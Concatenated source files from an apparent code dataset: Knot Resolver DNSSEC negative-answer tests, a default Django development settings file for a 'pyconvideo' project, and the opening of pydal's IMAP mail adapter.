flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nonexistent.nsec.test.knot-resolver.cz. IN A
;ANSWER
;AUTHORITY
nsec.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
nsec.test.knot-resolver.cz. 7200 IN NSEC unsigned.nsec.test.knot-resolver.cz. A NS SOA RRSIG NSEC DNSKEY CDS CDNSKEY
nsec.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. Nwpe3F7+fiCeGgyP+0WgyGYC5N8MY4Pc bipFKsHBxgkwkdEyV395VvYCbhz5YuJb SyXsv9tXOVN+XSb5Sac8uQ==
nsec.test.knot-resolver.cz. 7200 IN RRSIG NSEC 13 4 7200 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. ugmndbqwWjM5Zc/ZCEt/FeGSuw70sasu jylUhFljwdalhRNNlLNcQY9Tlr8A8Vnc YJCwI36LrwAp9m/W2ysZxQ==
;ADDITIONAL""")
def test_negative_nsec_answers(forwarder, tcp):
return answer_checker.send_and_check(NSEC_NEGATIVE_QUERY,
NSEC_NEGATIVE_ANSWER,
forwarder,
HEADER | {"authority"}, tcp=tcp)
NSEC3_NEGATIVE_QUERY = answer_checker.make_random_case_query("nonexistent.nsec3.test.knot-resolver.cz", "A", want_dnssec=True)
NSEC3_NEGATIVE_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NXDOMAIN
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nonexistent.nsec3.test.knot-resolver.cz. IN A
;ANSWER
;AUTHORITY
nsec3.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 6j18444t948b3ij9dlakm317q132ccii A NS SOA RRSIG DNSKEY NSEC3PARAM CDS CDNSKEY
af4kdouqgq3k3j0boq2bqlf4hi14c8qa.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 druje9e1goigmosgk4m6iv7gbktg143a CNAME RRSIG
nsec3.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. 9Ne2jUhyILPa5r0lAUdqkHtbkggSiRbt yqRaH3ENGlYcIIA3Rib6U2js+wEQpYVs SdQPcuzwAkYGmsqroSnDIw==
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. r7DbpNp4KXvV2a4TDoV3whUPpI6mmjKA bk5TQZnA/z1AwFMtzJDQJ7b9RCv2C9Es CbwKEa+/bLNH4N2Ed8RVPQ==
af4kdouqgq3k3j0boq2bqlf4hi14c8qa.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370119135450 20190205122450 52462 nsec3.test.knot-resolver.cz. NXEa3JxBpufEqBDEUNQhH2kQpPQbXYDX /b1soMKA4CwSaRVgiMkw41vevUZ/XtPj SFl0D6ov88QEDLG2RzYy9g==
;ADDITIONAL""")
def test_negative_nsec3_answers(forwarder, tcp):
return answer_checker.send_and_check(NSEC3_NEGATIVE_QUERY,
NSEC3_NEGATIVE_ANSWER,
forwarder,
HEADER | {"authority"}, tcp=tcp)
UNKNOWN_TYPE_QUERY = answer_checker.make_random_case_query("weird-type.test.knot-resolver.cz", "TYPE20025", want_dnssec=True)
UNKNOWN_TYPE_ANSWER = dns.message.from_text(r""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 512
;QUESTION
weird-type.test.knot-resolver.cz. IN TYPE20025
;ANSWER
weird-type.test.knot-resolver.cz. 3506 IN TYPE20025 \# 4 deadbeef
weird-type.test.knot-resolver.cz. 3506 IN RRSIG TYPE20025 13 4 3600 20370119135450 20190205122450 58 test.knot-resolver.cz. eHON73HpRyhIalC4xHwu/zWcZWuyVC3T fpBaOQU1MabzitXBUy4dKoAMVXhcpj62 Pqiz2FxMMg6nXRQJupQDAA==
;AUTHORITY
;ADDITIONAL
""")
def test_unknown_rrtype(forwarder, tcp):
return answer_checker.send_and_check(UNKNOWN_TYPE_QUERY,
UNKNOWN_TYPE_ANSWER,
forwarder,
ALL - {"additional", "authority"},
tcp=tcp)
NONEXISTENT_DS_DELEGATION_NSEC_QUERY = answer_checker.make_random_case_query("unsigned.nsec.test.knot-resolver.cz", "DS", want_dnssec=True)
NONEXISTENT_DS_DELEGATION_NSEC_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
unsigned.nsec.test.knot-resolver.cz. IN DS
;ANSWER
;AUTHORITY
nsec.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
unsigned.nsec.test.knot-resolver.cz. 7200 IN NSEC *.wild.nsec.test.knot-resolver.cz. NS RRSIG NSEC
nsec.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. Nwpe3F7+fiCeGgyP+0WgyGYC5N8MY4Pc bipFKsHBxgkwkdEyV395VvYCbhz5YuJb SyXsv9tXOVN+XSb5Sac8uQ==
unsigned.nsec.test.knot-resolver.cz. 7200 IN RRSIG NSEC 13 5 7200 20370119135450 20190205122450 25023 nsec.test.knot-resolver.cz. SWIzKCXTRQMz1n7myOioFrfbTljjR4jG NVRV43NWKtXQ6ftIR68wSVZ+6xsATHeG GXYYJxqaoviY+mLrJdJa/g==
;ADDITIONAL""")
def test_delegation_from_nsec_to_unsigned_zone(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_DS_DELEGATION_NSEC_QUERY,
NONEXISTENT_DS_DELEGATION_NSEC_ANSWER,
forwarder,
ALL, tcp=tcp)
NONEXISTENT_DS_DELEGATION_NSEC3_QUERY = answer_checker.make_random_case_query("unsigned.nsec3.test.knot-resolver.cz", "DS", want_dnssec=True)
NONEXISTENT_DS_DELEGATION_NSEC3_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
unsigned.nsec3.test.knot-resolver.cz. IN DS
;ANSWER
;AUTHORITY
nsec3.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
gk65ucsupb4m139fn027ci6pl01fk5gs.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 mn71vn3kbnse5hkqqs7kc062nf9jna3u NS
nsec3.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. 9Ne2jUhyILPa5r0lAUdqkHtbkggSiRbt yqRaH3ENGlYcIIA3Rib6U2js+wEQpYVs SdQPcuzwAkYGmsqroSnDIw==
gk65ucsupb4m139fn027ci6pl01fk5gs.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370119135450 20190205122450 52462 nsec3.test.knot-resolver.cz. WjWrhgoRmw8+xMuzcGLqPx76xEvPTQjN OaJOEXzK7409Jc7tVHgpolbNxsDdI0u+ h6s5Du78yx4z0QOCq2VEzg==
;ADDITIONAL""")
def test_delegation_from_nsec3_to_unsigned_zone(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_DS_DELEGATION_NSEC3_QUERY,
NONEXISTENT_DS_DELEGATION_NSEC3_ANSWER,
forwarder,
ALL, tcp=tcp)
NONEXISTENT_DELEGATION_FROM_NSEC_QUERY = answer_checker.make_random_case_query("nonexistent.nsec.test.knot-resolver.cz", "DS", want_dnssec=True)
NONEXISTENT_DELEGATION_FROM_NSEC_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NXDOMAIN
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nonexistent.nsec.test.knot-resolver.cz. IN DS
;ANSWER
;AUTHORITY
nsec.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
nsec.test.knot-resolver.cz. 7200 IN NSEC unsigned.nsec.test.knot-resolver.cz. A NS SOA RRSIG NSEC DNSKEY CDS CDNSKEY
nsec.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. Nwpe3F7+fiCeGgyP+0WgyGYC5N8MY4Pc bipFKsHBxgkwkdEyV395VvYCbhz5YuJb SyXsv9tXOVN+XSb5Sac8uQ==
nsec.test.knot-resolver.cz. 7200 IN RRSIG NSEC 13 4 7200 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. ugmndbqwWjM5Zc/ZCEt/FeGSuw70sasu jylUhFljwdalhRNNlLNcQY9Tlr8A8Vnc YJCwI36LrwAp9m/W2ysZxQ==
;ADDITIONAL""")
def test_nonexistent_delegation_from_nsec(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_DELEGATION_FROM_NSEC_QUERY,
NONEXISTENT_DELEGATION_FROM_NSEC_ANSWER,
forwarder,
ALL, tcp=tcp,
unset_flags=[dns.flags.AA])
# Some resolvers treat the generated proof of non-existence as authoritative
# data and set the AA flag in this kind of answer, so we have to normalize
# this by unsetting it.
NONEXISTENT_DELEGATION_FROM_NSEC3_QUERY = answer_checker.make_random_case_query("nonexistent.nsec3.test.knot-resolver.cz", "DS", want_dnssec=True)
NONEXISTENT_DELEGATION_FROM_NSEC3_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NXDOMAIN
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nonexistent.nsec3.test.knot-resolver.cz. IN DS
;ANSWER
;AUTHORITY
nsec3.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 6j18444t948b3ij9dlakm317q132ccii A NS SOA RRSIG DNSKEY NSEC3PARAM CDS CDNSKEY
af4kdouqgq3k3j0boq2bqlf4hi14c8qa.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 druje9e1goigmosgk4m6iv7gbktg143a CNAME RRSIG
nsec3.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. 9Ne2jUhyILPa5r0lAUdqkHtbkggSiRbt yqRaH3ENGlYcIIA3Rib6U2js+wEQpYVs SdQPcuzwAkYGmsqroSnDIw==
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. r7DbpNp4KXvV2a4TDoV3whUPpI6mmjKA bk5TQZnA/z1AwFMtzJDQJ7b9RCv2C9Es CbwKEa+/bLNH4N2Ed8RVPQ==
af4kdouqgq3k3j0boq2bqlf4hi14c8qa.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370119135450 20190205122450 52462 nsec3.test.knot-resolver.cz. NXEa3JxBpufEqBDEUNQhH2kQpPQbXYDX /b1soMKA4CwSaRVgiMkw41vevUZ/XtPj SFl0D6ov88QEDLG2RzYy9g==
;ADDITIONAL""")
def test_nonexistent_delegation_from_nsec3(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_DELEGATION_FROM_NSEC3_QUERY,
NONEXISTENT_DELEGATION_FROM_NSEC3_ANSWER,
forwarder,
ALL, tcp=tcp,
unset_flags=[dns.flags.AA])
NONEXISTENT_TYPE_NSEC3_QUERY = answer_checker.make_random_case_query("nsec3.test.knot-resolver.cz", "TYPE65281", want_dnssec=True)
NONEXISTENT_TYPE_NSEC3_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nsec3.test.knot-resolver.cz. IN TYPE65281
;ANSWER
;AUTHORITY
nsec3.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 6j18444t948b3ij9dlakm317q132ccii A NS SOA RRSIG DNSKEY NSEC3PARAM CDS CDNSKEY
nsec3.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. 9Ne2jUhyILPa5r0lAUdqkHtbkggSiRbt yqRaH3ENGlYcIIA3Rib6U2js+wEQpYVs SdQPcuzwAkYGmsqroSnDIw==
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. r7DbpNp4KXvV2a4TDoV3whUPpI6mmjKA bk5TQZnA/z1AwFMtzJDQJ7b9RCv2C9Es CbwKEa+/bLNH4N2Ed8RVPQ==
;ADDITIONAL""")
def test_nonexistent_type_nsec3(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_TYPE_NSEC3_QUERY,
NONEXISTENT_TYPE_NSEC3_ANSWER,
forwarder,
ALL, tcp=tcp)
NONEXISTENT_TYPE_NSEC_QUERY = answer_checker.make_random_case_query("nsec.test.knot-resolver.cz", "TYPE65281", want_dnssec=True)
NONEXISTENT_TYPE_NSEC_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nsec.test.knot-resolver.cz. IN TYPE65281
;ANSWER
;AUTHORITY
nsec.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
nsec.test.knot-resolver.cz. 7200 IN NSEC unsigned.nsec.test.knot-resolver.cz. A NS SOA RRSIG NSEC DNSKEY CDS CDNSKEY
nsec.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. Nwpe3F7+fiCeGgyP+0WgyGYC5N8MY4Pc bipFKsHBxgkwkdEyV395VvYCbhz5YuJb SyXsv9tXOVN+XSb5Sac8uQ==
nsec.test.knot-resolver.cz. 7200 IN RRSIG NSEC 13 4 7200 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. ugmndbqwWjM5Zc/ZCEt/FeGSuw70sasu jylUhFljwdalhRNNlLNcQY9Tlr8A8Vnc YJCwI36LrwAp9m/W2ysZxQ==
;ADDITIONAL""")
def test_nonexistent_type_nsec(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_TYPE_NSEC_QUERY,
NONEXISTENT_TYPE_NSEC_ANSWER,
forwarder,
ALL, tcp=tcp)
| bsd-2-clause | -6,005,803,781,573,818,000 | 47.790698 | 247 | 0.71645 | false |
subash68/pyconvideo | src/pyconvideo/settings.py | 1 | 3180 | """
Django settings for pyconvideo project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$@_5k3q-++9=bs50d0+tjkw^(iy+_5z$ycu!9l-o-r4_co1#ww'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pyconvideo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pyconvideo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| gpl-3.0 | -5,179,506,293,819,358,000 | 24.853659 | 91 | 0.688679 | false |
xiang12835/python_web | py2_web2py/web2py/gluon/packages/dal/pydal/contrib/imap_adapter.py | 4 | 43046 | # -*- coding: utf-8 -*-
import datetime
import re
import sys
from .._globals import IDENTITY, GLOBAL_LOCKER
from .._compat import PY2, integer_types, basestring
from ..connection import ConnectionPool
from ..objects import Field, Query, Expression
from ..helpers.classes import SQLALL
from ..helpers.methods import use_common_filters
from ..adapters.base import NoSQLAdapter
long = integer_types[-1]
class IMAPAdapter(NoSQLAdapter):
""" IMAP server adapter
    This class is intended as an interface with
    email IMAP servers to perform simple queries in the
    web2py DAL query syntax, so email reading, searching and
    other related IMAP mail services (as those implemented
    by brands like Google(r) and Yahoo!(r))
    can be managed from web2py applications.
The code uses examples by Yuji Tomita on this post:
http://yuji.wordpress.com/2011/06/22/python-imaplib-imap-example-with-gmail/#comment-1137
    and is based on the docs for Python imaplib, python email
    and the email IETF RFCs (i.e. RFC2060 and RFC3501)
    This adapter was tested with a small set of operations with Gmail(r). Requests
    to other services could raise command syntax and response data issues.
It creates its table and field names "statically",
meaning that the developer should leave the table and field
definitions to the DAL instance by calling the adapter's
.define_tables() method. The tables are defined with the
IMAP server mailbox list information.
.define_tables() returns a dictionary mapping dal tablenames
to the server mailbox names with the following structure:
{<tablename>: str <server mailbox name>}
Here is a list of supported fields:
=========== ============== ===========
Field Type Description
=========== ============== ===========
uid string
answered boolean Flag
created date
content list:string A list of dict text or html parts
to string
cc string
bcc string
size integer the amount of octets of the message*
deleted boolean Flag
draft boolean Flag
flagged boolean Flag
sender string
recent boolean Flag
seen boolean Flag
subject string
mime string The mime header declaration
email string The complete RFC822 message (*)
attachments list Each non text part as dict
encoding string The main detected encoding
=========== ============== ===========
(*) At the application side it is measured as the length of the RFC822
message string
WARNING: As row id's are mapped to email sequence numbers,
make sure your imap client web2py app does not delete messages
during select or update actions, to prevent
updating or deleting different messages.
Sequence numbers change whenever the mailbox is updated.
    To avoid these sequence number issues, the use of uid fields
    in query references is recommended (although the update and delete
    in separate actions rule still applies).
::
# This is the code recommended to start imap support
# at the app's model:
imapdb = DAL("imap://user:password@server:port", pool_size=1) # port 993 for ssl
imapdb.define_tables()
Here is an (incomplete) list of possible imap commands::
# Count today's unseen messages
# smaller than 6000 octets from the
# inbox mailbox
q = imapdb.INBOX.seen == False
q &= imapdb.INBOX.created == datetime.date.today()
q &= imapdb.INBOX.size < 6000
unread = imapdb(q).count()
# Fetch last query messages
rows = imapdb(q).select()
# it is also possible to filter query select results with limitby and
# sequences of mailbox fields
set.select(<fields sequence>, limitby=(<int>, <int>))
# Mark last query messages as seen
messages = [row.uid for row in rows]
seen = imapdb(imapdb.INBOX.uid.belongs(messages)).update(seen=True)
# Delete messages in the imap database that have mails from mr. Gumby
deleted = 0
        for mailbox in imapdb.tables:
deleted += imapdb(imapdb[mailbox].sender.contains("gumby")).delete()
        # It is possible also to mark messages for deletion instead of erasing them
# directly with set.update(deleted=True)
        # This object gives access
# to the adapter auto mailbox
# mapped names (which native
# mailbox has what table name)
imapdb.mailboxes <dict> # tablename, server native name pairs
# To retrieve a table native mailbox name use:
imapdb.<table>.mailbox
### New features v2.4.1:
# Declare mailboxes statically with tablename, name pairs
# This avoids the extra server names retrieval
imapdb.define_tables({"inbox": "INBOX"})
# Selects without content/attachments/email columns will only
# fetch header and flags
imapdb(q).select(imapdb.INBOX.sender, imapdb.INBOX.subject)
"""
drivers = ('imaplib',)
types = {
'string': str,
'text': str,
'date': datetime.date,
'datetime': datetime.datetime,
'id': long,
'boolean': bool,
'integer': int,
'bigint': long,
'blob': str,
'list:string': str
}
dbengine = 'imap'
    REGEX_URI = re.compile(r'^(?P<user>[^:]+)(\:(?P<password>[^@]*))?@(?P<host>\[[^/]+\]|[^\:@]+)(\:(?P<port>[0-9]+))?$')
def __init__(self,
db,
uri,
pool_size=0,
folder=None,
db_codec ='UTF-8',
credential_decoder=IDENTITY,
driver_args={},
adapter_args={},
do_connect=True,
after_connection=None):
super(IMAPAdapter, self).__init__(
db=db,
uri=uri,
pool_size=pool_size,
folder=folder,
db_codec=db_codec,
credential_decoder=credential_decoder,
driver_args=driver_args,
adapter_args=adapter_args,
do_connect=do_connect,
after_connection=after_connection)
# db uri: [email protected]:[email protected]:123
# TODO: max size adapter argument for preventing large mail transfers
if do_connect: self.find_driver(adapter_args)
self.credential_decoder = credential_decoder
self.driver_args = driver_args
self.adapter_args = adapter_args
self.mailbox_size = None
self.static_names = None
self.charset = sys.getfilesystemencoding()
# imap class
self.imap4 = None
uri = uri.split("://")[1]
""" MESSAGE is an identifier for sequence number"""
self.flags = {'deleted': '\\Deleted', 'draft': '\\Draft',
'flagged': '\\Flagged', 'recent': '\\Recent',
'seen': '\\Seen', 'answered': '\\Answered'}
self.search_fields = {
'id': 'MESSAGE', 'created': 'DATE',
'uid': 'UID', 'sender': 'FROM',
'to': 'TO', 'cc': 'CC',
'bcc': 'BCC', 'content': 'TEXT',
'size': 'SIZE', 'deleted': '\\Deleted',
'draft': '\\Draft', 'flagged': '\\Flagged',
'recent': '\\Recent', 'seen': '\\Seen',
'subject': 'SUBJECT', 'answered': '\\Answered',
'mime': None, 'email': None,
'attachments': None
}
m = self.REGEX_URI.match(uri)
user = m.group('user')
password = m.group('password')
host = m.group('host')
port = int(m.group('port'))
over_ssl = False
if port==993:
over_ssl = True
driver_args.update(host=host,port=port, password=password, user=user)
def connector(driver_args=driver_args):
            # successful authentication is always assumed
# TODO: support direct connection and login tests
if over_ssl:
self.imap4 = self.driver.IMAP4_SSL
else:
self.imap4 = self.driver.IMAP4
connection = self.imap4(driver_args["host"], driver_args["port"])
data = connection.login(driver_args["user"], driver_args["password"])
# static mailbox list
connection.mailbox_names = None
# dummy dbapi functions
connection.cursor = lambda : self.fake_cursor
connection.close = lambda : None
connection.commit = lambda : None
return connection
self.db.define_tables = self.define_tables
self.connector = connector
if do_connect: self.reconnect()
def reconnect(self, f=None):
"""
IMAP4 Pool connection method
        The IMAP connection lacks a cursor command, so a custom
        replacement is provided for connection pooling to prevent
        uncaught closing of the remote session.
"""
if getattr(self, 'connection', None) is not None:
return
if f is None:
f = self.connector
if not self.pool_size:
self.connection = f()
self.cursor = self.connection.cursor()
else:
POOLS = ConnectionPool.POOLS
uri = self.uri
while True:
GLOBAL_LOCKER.acquire()
if not uri in POOLS:
POOLS[uri] = []
if POOLS[uri]:
self.connection = POOLS[uri].pop()
GLOBAL_LOCKER.release()
self.cursor = self.connection.cursor()
if self.cursor and self.check_active_connection:
try:
# check if connection is alive or close it
result, data = self.connection.list()
except:
# Possible connection reset error
# TODO: read exception class
self.connection = f()
break
else:
GLOBAL_LOCKER.release()
self.connection = f()
self.cursor = self.connection.cursor()
break
self.after_connection_hook()
def get_last_message(self, tablename):
last_message = None
# request mailbox list to the server if needed.
if not isinstance(self.connection.mailbox_names, dict):
self.get_mailboxes()
try:
result = self.connection.select(
self.connection.mailbox_names[tablename])
last_message = int(result[1][0])
# Last message must be a positive integer
if last_message == 0:
last_message = 1
except (IndexError, ValueError, TypeError, KeyError):
e = sys.exc_info()[1]
self.db.logger.debug("Error retrieving the last mailbox" +
" sequence number. %s" % str(e))
return last_message
def get_uid_bounds(self, tablename):
if not isinstance(self.connection.mailbox_names, dict):
self.get_mailboxes()
# fetch first and last messages
# return (first, last) messages uid's
last_message = self.get_last_message(tablename)
result, data = self.connection.uid("search", None, "(ALL)")
uid_list = data[0].strip().split()
if len(uid_list) <= 0:
return None
else:
return (uid_list[0], uid_list[-1])
    def convert_date(self, date, add=None, imf=False):
        """ Convert a date object to a string
        with d-Mon-Y style for IMAP or the inverse
        case
        add <timedelta> adds to the date object
        """
        if add is None:
            add = datetime.timedelta()
months = [None, "JAN","FEB","MAR","APR","MAY","JUN",
"JUL", "AUG","SEP","OCT","NOV","DEC"]
if isinstance(date, basestring):
# Prevent unexpected date response format
try:
if "," in date:
dayname, datestring = date.split(",")
else:
dayname, datestring = None, date
date_list = datestring.strip().split()
year = int(date_list[2])
month = months.index(date_list[1].upper())
day = int(date_list[0])
hms = list(map(int, date_list[3].split(":")))
return datetime.datetime(year, month, day,
hms[0], hms[1], hms[2]) + add
except (ValueError, AttributeError, IndexError) as e:
self.db.logger.error("Could not parse date text: %s. %s" %
(date, e))
return None
elif isinstance(date, (datetime.date, datetime.datetime)):
if imf: date_format = "%a, %d %b %Y %H:%M:%S %z"
else: date_format = "%d-%b-%Y"
return (date + add).strftime(date_format)
else:
return None
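    # Illustrative sketch of convert_date in both directions, assuming
    # `adapter` is a connected IMAPAdapter instance:
    #
    #   adapter.convert_date(datetime.date(2019, 2, 1))
    #   # -> '01-Feb-2019' (IMAP d-Mon-Y style)
    #   adapter.convert_date("Fri, 1 Feb 2019 10:30:00 +0000")
    #   # -> datetime.datetime(2019, 2, 1, 10, 30)
    #   adapter.convert_date(datetime.date(2019, 2, 1), imf=True)
    #   # -> Internet Message Format style, for message headers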
@staticmethod
def header_represent(f, r):
from email.header import decode_header
text, encoding = decode_header(f)[0]
if encoding:
text = text.decode(encoding).encode('utf-8')
return text
def encode_text(self, text, charset, errors="replace"):
""" convert text for mail to unicode"""
if text is None:
text = ""
if PY2:
if isinstance(text, str):
if charset is None:
text = unicode(text, "utf-8", errors)
else:
text = unicode(text, charset, errors)
else:
raise Exception("Unsupported mail text type %s" % type(text))
return text.encode("utf-8")
else:
if isinstance(text, bytes):
return text.decode("utf-8")
return text
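    # Illustrative sketch: encode_text normalizes mail payload text for
    # storage, replacing undecodable characters. For example, assuming a
    # latin-1 encoded payload on Python 2:
    #
    #   adapter.encode_text(b'caf\xe9', 'latin-1')  # -> 'caf\xc3\xa9' (UTF-8)
    #   adapter.encode_text(None, None)             # -> '' (None becomes empty)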
def get_charset(self, message):
charset = message.get_content_charset()
return charset
def get_mailboxes(self):
""" Query the mail database for mailbox names """
if self.static_names:
# statically defined mailbox names
self.connection.mailbox_names = self.static_names
return self.static_names.keys()
mailboxes_list = self.connection.list()
self.connection.mailbox_names = dict()
mailboxes = list()
x = 0
for item in mailboxes_list[1]:
x = x + 1
item = item.strip()
if not "NOSELECT" in item.upper():
sub_items = item.split("\"")
sub_items = [sub_item for sub_item in sub_items \
if len(sub_item.strip()) > 0]
# mailbox = sub_items[len(sub_items) -1]
mailbox = sub_items[-1].strip()
# remove unwanted characters and store original names
# Don't allow leading non alphabetic characters
mailbox_name = re.sub('^[_0-9]*', '', re.sub('[^_\w]','',re.sub('[/ ]','_',mailbox)))
mailboxes.append(mailbox_name)
self.connection.mailbox_names[mailbox_name] = mailbox
return mailboxes
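    # Illustrative sketch of the name mangling above: native mailbox names
    # are mapped to valid DAL table names, while the original names are
    # kept in connection.mailbox_names for the server-side commands, e.g.
    #
    #   '[Gmail]/All Mail' -> '[Gmail]_All_Mail' -> 'Gmail_All_Mail'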
def get_query_mailbox(self, query):
nofield = True
tablename = None
attr = query
while nofield:
if hasattr(attr, "first"):
attr = attr.first
if isinstance(attr, Field):
return attr.tablename
elif isinstance(attr, Query):
pass
else:
return None
else:
return None
return tablename
def is_flag(self, flag):
if self.search_fields.get(flag, None) in self.flags.values():
return True
else:
return False
def define_tables(self, mailbox_names=None):
"""
        Auto create common IMAP fields
        This function creates field definitions "statically",
        meaning that custom fields (as in other adapters) are
        not supported and definitions are handled on a
        service/mode basis (local syntax for Gmail(r), Ymail(r)).
Returns a dictionary with tablename, server native mailbox name
